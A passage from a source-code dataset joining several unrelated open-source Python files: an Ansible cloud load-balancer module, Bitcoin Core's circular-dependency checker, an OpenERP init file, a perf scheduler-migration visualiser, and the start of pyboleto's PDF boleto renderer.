Retrieves unique ID of loadbalancer
:param name: Name of loadbalancer
:return: Unique ID of the loadbalancer
"""
id = None
for lb in self.lb_dict:
if lb.get('name') == name:
id = lb.get('id')
return id
def _get_loadbalancer_list(self, alias, location):
"""
Retrieve a list of loadbalancers
:param alias: Alias for account
:param location: Datacenter
:return: JSON data for all loadbalancers at datacenter
"""
result = None
try:
result = self.clc.v2.API.Call(
'GET', '/v2/sharedLoadBalancers/%s/%s' % (alias, location))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to fetch load balancers for account: {0}. {1}'.format(
alias, str(e.response_text)))
return result
def _loadbalancer_exists(self, name):
"""
Verify a loadbalancer exists
:param name: Name of loadbalancer
:return: False or the ID of the existing loadbalancer
"""
result = False
for lb in self.lb_dict:
if lb.get('name') == name:
result = lb.get('id')
return result
def _loadbalancerpool_exists(self, alias, location, port, lb_id):
"""
Checks to see if a pool exists on the specified port on the provided load balancer
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param port: the port to check and see if it exists
:param lb_id: the id string of the provided load balancer
:return: result: The id string of the pool or False
"""
result = False
try:
pool_list = self.clc.v2.API.Call(
'GET', '/v2/sharedLoadBalancers/%s/%s/%s/pools' %
(alias, location, lb_id))
except APIFailedResponse as e:
return self.module.fail_json(
msg='Unable to fetch the load balancer pools for for load balancer id: {0}. {1}'.format(
lb_id, str(e.response_text)))
for pool in pool_list:
if int(pool.get('port')) == int(port):
result = pool.get('id')
return result
def _loadbalancerpool_nodes_exists(
self, alias, location, lb_id, pool_id, nodes_to_check):
"""
Checks to see if a set of nodes exists on the specified port on the provided load balancer
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the provided load balancer
:param pool_id: the id string of the load balancer pool
:param nodes_to_check: the list of nodes to check for
:return: result: True / False indicating if the given nodes exist
"""
result = False
nodes = self._get_lbpool_nodes(alias, location, lb_id, pool_id)
for node in nodes_to_check:
if not node.get('status'):
node['status'] = 'enabled'
if node in nodes:
result = True
else:
result = False
return result
def set_loadbalancernodes(self, alias, location, lb_id, pool_id, nodes):
"""
Updates nodes to the provided pool
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the pool
:param nodes: a list of dictionaries containing the nodes to set
:return: result: The result from the CLC API call
"""
result = None
if not lb_id:
return result
if not self.module.check_mode:
try:
result = self.clc.v2.API.Call('PUT',
'/v2/sharedLoadBalancers/%s/%s/%s/pools/%s/nodes'
% (alias, location, lb_id, pool_id), json.dumps(nodes))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to set nodes for the load balancer pool id "{0}". {1}'.format(
pool_id, str(e.response_text)))
return result
def add_lbpool_nodes(self, alias, location, lb_id, pool_id, nodes_to_add):
"""
Add nodes to the provided pool
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the pool
:param nodes_to_add: a list of dictionaries containing the nodes to add
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
result = {}
nodes = self._get_lbpool_nodes(alias, location, lb_id, pool_id)
for node in nodes_to_add:
if not node.get('status'):
node['status'] = 'enabled'
if not node in nodes:
changed = True
nodes.append(node)
if changed == True and not self.module.check_mode:
result = self.set_loadbalancernodes(
alias,
location,
lb_id,
pool_id,
nodes)
return changed, result
def remove_lbpool_nodes(
self, alias, location, lb_id, pool_id, nodes_to_remove):
"""
Removes nodes from the provided pool
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the pool
:param nodes_to_remove: a list of dictionaries containing the nodes to remove
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
result = {}
nodes = self._get_lbpool_nodes(alias, location, lb_id, pool_id)
for node in nodes_to_remove:
if not node.get('status'):
node['status'] = 'enabled'
if node in nodes:
changed = True
nodes.remove(node)
if changed == True and not self.module.check_mode:
result = self.set_loadbalancernodes(
alias,
location,
lb_id,
pool_id,
nodes)
return changed, result
def _get_lbpool_nodes(self, alias, location, lb_id, pool_id):
"""
Return the list of nodes available to the provided load balancer pool
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the pool
:return: result: The list of nodes
"""
result = None
try:
result = self.clc.v2.API.Call('GET',
'/v2/sharedLoadBalancers/%s/%s/%s/pools/%s/nodes'
% (alias, location, lb_id, pool_id))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to fetch list of available nodes for load balancer pool id: {0}. {1}'.format(
pool_id, str(e.response_text)))
return result
@staticmethod
def define_argument_spec():
"""
Define the argument spec for the ansible module
:return: argument spec dictionary
"""
argument_spec = dict(
name=dict(required=True),
description=dict(default=None),
location=dict(required=True, default=None),
alias=dict(required=True, default=None),
port=dict(choices=[80, 443]),
method=dict(choices=['leastConnection', 'roundRobin']),
persistence=dict(choices=['standard', 'sticky']),
nodes=dict(type='list', default=[]),
status=dict(default='enabled', choices=['enabled', 'disabled']),
state=dict(
default='present',
choices=[
'present',
'absent',
'port_absent',
'nodes_present',
'nodes_absent'])
)
return argument_spec
def _set_clc_credentials_from_env(self):
"""
Set the CLC Credentials on the sdk by reading environment variables
:return: none
"""
env = os.environ
v2_api_token = env.get('CLC_V2_API_TOKEN', False)
v2_api_username = env.get('CLC_V2_API_USERNAME', False)
v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
clc_alias = env.get('CLC_ACCT_ALIAS', False)
api_url = env.get('CLC_V2_API_URL', False)
if api_url:
self.clc.defaults.ENDPOINT_URL_V2 = api_url
if v2_api_token and clc_alias:
self.clc._LOGIN_TOKEN_V2 = v2_api_token
self.clc._V2_ENABLED = True
self.clc.ALIAS = clc_alias
elif v2_api_username and v2_api_passwd:
self.clc.v2.SetCredentials(
api_username=v2_api_username,
api_passwd=v2_api_passwd)
else:
return self.module.fail_json(
msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
"environment variables")
@staticmethod
def _set_user_agent(clc):
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
"""
The main function. Instantiates the module and calls process_request.
:return: none
"""
module = AnsibleModule(argument_spec=ClcLoadBalancer.define_argument_spec(),
supports_check_mode=True)
clc_loadbalancer = ClcLoadBalancer(module)
clc_loadbalancer.process_request()
from ansible.module_utils.basic import * # pylint: disable=W0614
if __name__ == '__main__':
main()
| gpl-3.0 |
practicalswift/bitcoin | contrib/devtools/circular-dependencies.py | 29 | 3219 | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import sys
import re
from typing import Dict, List, Set
MAPPING = {
'core_read.cpp': 'core_io.cpp',
'core_write.cpp': 'core_io.cpp',
}
# Directories with header-based modules, where the assumption that .cpp files
# define functions and variables declared in corresponding .h files is
# incorrect.
HEADER_MODULE_PATHS = [
'interfaces/'
]
def module_name(path):
if path in MAPPING:
path = MAPPING[path]
if any(path.startswith(dirpath) for dirpath in HEADER_MODULE_PATHS):
return path
if path.endswith(".h"):
return path[:-2]
if path.endswith(".c"):
return path[:-2]
if path.endswith(".cpp"):
return path[:-4]
return None
files = dict()
deps: Dict[str, Set[str]] = dict()
RE = re.compile("^#include <(.*)>")
# Iterate over files, and create list of modules
for arg in sys.argv[1:]:
module = module_name(arg)
if module is None:
print("Ignoring file %s (does not constitute module)\n" % arg)
else:
files[arg] = module
deps[module] = set()
# Iterate again, and build list of direct dependencies for each module
# TODO: implement support for multiple include directories
for arg in sorted(files.keys()):
module = files[arg]
with open(arg, 'r', encoding="utf8") as f:
for line in f:
match = RE.match(line)
if match:
include = match.group(1)
included_module = module_name(include)
if included_module is not None and included_module in deps and included_module != module:
deps[module].add(included_module)
# Loop to find the shortest (remaining) circular dependency
have_cycle: bool = False
while True:
shortest_cycle = None
for module in sorted(deps.keys()):
# Build the transitive closure of dependencies of module
closure: Dict[str, List[str]] = dict()
for dep in deps[module]:
closure[dep] = []
while True:
old_size = len(closure)
old_closure_keys = sorted(closure.keys())
for src in old_closure_keys:
for dep in deps[src]:
if dep not in closure:
closure[dep] = closure[src] + [src]
if len(closure) == old_size:
break
# If module is in its own transitive closure, it's a circular dependency; check if it is the shortest
if module in closure and (shortest_cycle is None or len(closure[module]) + 1 < len(shortest_cycle)):
shortest_cycle = [module] + closure[module]
if shortest_cycle is None:
break
# We have the shortest circular dependency; report it
module = shortest_cycle[0]
print("Circular dependency: %s" % (" -> ".join(shortest_cycle + [module])))
# And then break the dependency to avoid repeating in other cycles
deps[shortest_cycle[-1]] = deps[shortest_cycle[-1]] - set([module])
have_cycle = True
sys.exit(1 if have_cycle else 0)
| mit |
florian-dacosta/OCB | openerp/addons/base/module/report/__init__.py | 463 | 1089 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import ir_module_reference_print
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
detule/lge-linux-msm | tools/perf/scripts/python/sched-migration.py | 11215 | 11670 | #!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
ret += self.origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
def find_time_slice(self, ts):
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid):
pass
def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
pass
| gpl-2.0 |
lojaintegrada/pyboleto | pyboleto/pdf.py | 1 | 30840 | # -*- coding: utf-8 -*-
"""
pyboleto.pdf
~~~~~~~~~~~~
Classe Responsável por fazer o output do boleto em pdf usando Reportlab.
:copyright: © 2011 - 2012 by Eduardo Cereto Carvalho
:license: BSD, see LICENSE for more details.
"""
import os
from reportlab.graphics.barcode.common import I2of5
from reportlab.lib.colors import black
from reportlab.lib.pagesizes import A4, landscape as pagesize_landscape
from reportlab.lib.units import mm, cm
from reportlab.lib.utils import simpleSplit
from reportlab.pdfbase.pdfmetrics import stringWidth
from reportlab.pdfgen import canvas
class BoletoPDF(object):
"""Geração do Boleto em PDF
Esta classe é responsável por imprimir o boleto em PDF.
Outras classes podem ser implementadas no futuro com a mesma interface,
para fazer output em HTML, LaTeX, ...
Esta classe pode imprimir boletos em formato de carnê (2 boletos por
página) ou em formato de folha cheia.
:param file_descr: Um arquivo ou *file-like* class.
:param landscape: Formato da folha. Usar ``True`` para boleto
tipo carnê.
"""
def __init__(self, file_descr, landscape=False):
self.width = 190 * mm
self.widthCanhoto = 70 * mm
self.heightLine = 6.5 * mm
self.space = 2
self.fontSizeTitle = 6
self.fontSizeValue = 9
self.deltaTitle = self.heightLine - (self.fontSizeTitle + 1)
self.deltaFont = self.fontSizeValue + 1
if landscape:
pagesize = pagesize_landscape(A4)
else:
pagesize = A4
self.pdfCanvas = canvas.Canvas(file_descr, pagesize=pagesize)
self.pdfCanvas.setStrokeColor(black)
def _load_image(self, logo_image):
pyboleto_dir = os.path.dirname(os.path.abspath(__file__))
image_path = os.path.join(pyboleto_dir, 'media', logo_image)
return image_path
def _drawReciboSacadoCanhoto(self, boletoDados, x, y):
"""Imprime o Recibo do Sacado para modelo de carnê
:param boletoDados: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:type boletoDados: :class:`pyboleto.data.BoletoData`
"""
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
linhaInicial = 12
# Horizontal Lines
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0, 0, self.widthCanhoto)
self.pdfCanvas.setLineWidth(1)
self.__horizontalLine(0,
(linhaInicial + 0) * self.heightLine,
self.widthCanhoto)
self.__horizontalLine(0,
(linhaInicial + 1) * self.heightLine,
self.widthCanhoto)
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0,
(linhaInicial + 2) * self.heightLine,
self.widthCanhoto)
# Vertical Lines
self.pdfCanvas.setLineWidth(1)
self.__verticalLine(self.widthCanhoto - (35 * mm),
(linhaInicial + 0) * self.heightLine,
self.heightLine)
self.__verticalLine(self.widthCanhoto - (35 * mm),
(linhaInicial + 1) * self.heightLine,
self.heightLine)
self.pdfCanvas.setFont('Helvetica-Bold', 6)
self.pdfCanvas.drawRightString(self.widthCanhoto,
0 * self.heightLine + 3,
'Recibo do Pagador')
# Titles
self.pdfCanvas.setFont('Helvetica', 6)
self.deltaTitle = self.heightLine - (6 + 1)
self.pdfCanvas.drawString(
self.space,
(((linhaInicial + 0) * self.heightLine)) + self.deltaTitle,
'Nosso Número'
)
self.pdfCanvas.drawString(
self.widthCanhoto - (35 * mm) + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.deltaTitle,
'Vencimento'
)
self.pdfCanvas.drawString(
self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Agência/Código do Beneficiário'
)
self.pdfCanvas.drawString(
self.widthCanhoto - (35 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Valor Documento'
)
# Values
self.pdfCanvas.setFont('Helvetica', 9)
heighFont = 9 + 1
valorDocumento = self._formataValorParaExibir(
boletoDados.valor_documento
)
self.pdfCanvas.drawString(
self.space,
(((linhaInicial + 0) * self.heightLine)) + self.space,
boletoDados.format_nosso_numero()
)
self.pdfCanvas.drawString(
self.widthCanhoto - (35 * mm) + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.space,
boletoDados.data_vencimento.strftime('%d/%m/%Y')
)
self.pdfCanvas.drawString(
self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
boletoDados.agencia_conta_cedente
)
self.pdfCanvas.drawString(
self.widthCanhoto - (35 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
valorDocumento
)
demonstrativo = boletoDados.demonstrativo[0:12]
for i in range(len(demonstrativo)):
self.pdfCanvas.drawString(
2 * self.space,
(((linhaInicial - 1) * self.heightLine)) - (i * heighFont),
demonstrativo[i][0:55]
)
self.pdfCanvas.restoreState()
return (self.widthCanhoto,
((linhaInicial + 2) * self.heightLine))
def _drawReciboSacado(self, boletoDados, x, y):
"""Imprime o Recibo do Sacado para modelo de página inteira
:param boletoDados: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:type boletoDados: :class:`pyboleto.data.BoletoData`
"""
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
linhaInicial = 15
# Horizontal Lines
self.pdfCanvas.setLineWidth(1)
self.__horizontalLine(0,
(linhaInicial + 0) * self.heightLine,
self.width)
self.__horizontalLine(0,
(linhaInicial + 1) * self.heightLine,
self.width)
self.__horizontalLine(0,
(linhaInicial + 2) * self.heightLine,
self.width)
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0,
(linhaInicial + 3) * self.heightLine,
self.width)
# Vertical Lines
self.pdfCanvas.setLineWidth(1)
self.__verticalLine(
self.width - (30 * mm),
(linhaInicial + 0) * self.heightLine,
3 * self.heightLine
)
self.__verticalLine(
self.width - (30 * mm) - (35 * mm),
(linhaInicial + 1) * self.heightLine,
2 * self.heightLine
)
self.__verticalLine(
self.width - (30 * mm) - (35 * mm) - (40 * mm),
(linhaInicial + 1) * self.heightLine,
2 * self.heightLine
)
# Head
self.pdfCanvas.setLineWidth(2)
self.__verticalLine(40 * mm,
(linhaInicial + 3) * self.heightLine,
self.heightLine)
self.__verticalLine(60 * mm,
(linhaInicial + 3) * self.heightLine,
self.heightLine)
if boletoDados.logo_image:
logo_image_path = self._load_image(boletoDados.logo_image)
self.pdfCanvas.drawImage(
logo_image_path,
0, (linhaInicial + 3) * self.heightLine + 3,
40 * mm,
self.heightLine,
preserveAspectRatio=True,
anchor='sw'
)
self.pdfCanvas.setFont('Helvetica-Bold', 18)
self.pdfCanvas.drawCentredString(
50 * mm,
(linhaInicial + 3) * self.heightLine + 3,
boletoDados.codigo_dv_banco
)
self.pdfCanvas.setFont('Helvetica-Bold', 11.5)
self.pdfCanvas.drawRightString(
self.width,
(linhaInicial + 3) * self.heightLine + 3,
'Recibo do Pagador'
)
# Titles
self.pdfCanvas.setFont('Helvetica', 6)
self.deltaTitle = self.heightLine - (6 + 1)
self.pdfCanvas.drawRightString(
self.width,
self.heightLine,
'Autenticação Mecânica'
)
self.pdfCanvas.drawString(
0,
(((linhaInicial + 2) * self.heightLine)) + self.deltaTitle,
'Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.deltaTitle,
'CPF/CNPJ Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) - (40 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.deltaTitle,
'Agência/Código do Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.deltaTitle,
'Vencimento'
)
self.pdfCanvas.drawString(
0,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Pagador')
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) - (40 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Nosso Número')
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'N. do documento')
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Data Documento'
)
self.pdfCanvas.drawString(
0,
(((linhaInicial + 0) * self.heightLine)) + self.deltaTitle,
'Endereço Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.deltaTitle,
'Valor Documento'
)
self.pdfCanvas.drawString(
0,
(((linhaInicial + 0) * self.heightLine - 3 * cm)) +
self.deltaTitle,
'Demonstrativo'
)
# Values
self.pdfCanvas.setFont('Helvetica', 9)
heighFont = 9 + 1
self.pdfCanvas.drawString(
0 + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.space,
boletoDados.cedente
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) - (40 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.space,
boletoDados.agencia_conta_cedente
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.space,
boletoDados.cedente_documento
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.space,
boletoDados.data_vencimento.strftime('%d/%m/%Y')
)
# Take care of long field
sacado0 = unicode(boletoDados.sacado[0])
while(stringWidth(sacado0,
self.pdfCanvas._fontname,
self.pdfCanvas._fontsize) > 8.4 * cm):
#sacado0 = sacado0[:-2] + u'\u2026'
sacado0 = sacado0[:-4] + u'...'
